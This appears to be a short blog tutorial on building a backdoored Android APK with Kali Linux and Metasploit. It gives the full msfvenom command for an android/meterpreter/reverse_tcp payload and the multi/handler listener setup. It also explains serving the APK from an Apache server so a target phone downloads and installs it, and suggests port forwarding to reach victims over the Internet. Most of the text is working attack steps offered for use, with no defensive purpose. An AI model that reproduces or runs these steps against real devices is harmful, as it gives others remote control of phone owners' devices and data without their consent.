How To Make A APK Backdoor To Hack An Android Phone

Making a Android Backdoor using Kali Linux (metasploit)

Hello guys! Welcome to my first post about exploit an android phone using kali linux. I think i just made it. Lets see how it works.

Terminal

  • if you’re a linux user then you are ready for this tutorial and if you’re a windows or OS X user then make a kali bootable usb drive to perform this tutorial. Now in your linux  terminal type:

msfvenom -p android/meterpreter/reverse_tcp lhost 192.168.43.112 lport 443 R > /root/backdoor.apk
  • Replace Lhost with your own ip (Type “ifconfig” in your terminal to know your ip)


  • Open an another terminal to load Metasploit console,type(it will take some time):

msfconsole

Set-up a listener


  • Now you’re in Metasploit console. Now use malti-handler by typing this:

use exploit/multi/handler

  • Now set a reverse payload:

payload android/meterpreter/reverse_tcp
  • To set lhost type:

set lhost 192.168.43.112  
Don’t forget to replace lhost with your own ip.

  • To set-up lport type:
set lport 443

Exploit


  • Now we ready to exploit to listen to the backdoor by typing:

exploit” 

Send apk from your pc to the target or an android phone by using apache server. This hack is only for  the local networks.You can also hack android on WAN i.e. through Internet by using your Public/External IP in the LHOST and by port forwarding (ask me about port forwarding if you have problems in the comment section)

Apache Server 

  • Copy the backdoor.apk file from your root directory to  /var/www/html folder.
And open an terminal and type “service apache2 start”. Now open browser in your targert or android phone and type “192.168.43.112/backdoor.apk“. Replace ip with your ip address. It will be automatically downloaded in your android phone and after download the apk file install it in the target system.

MSFconsole

Leave a comment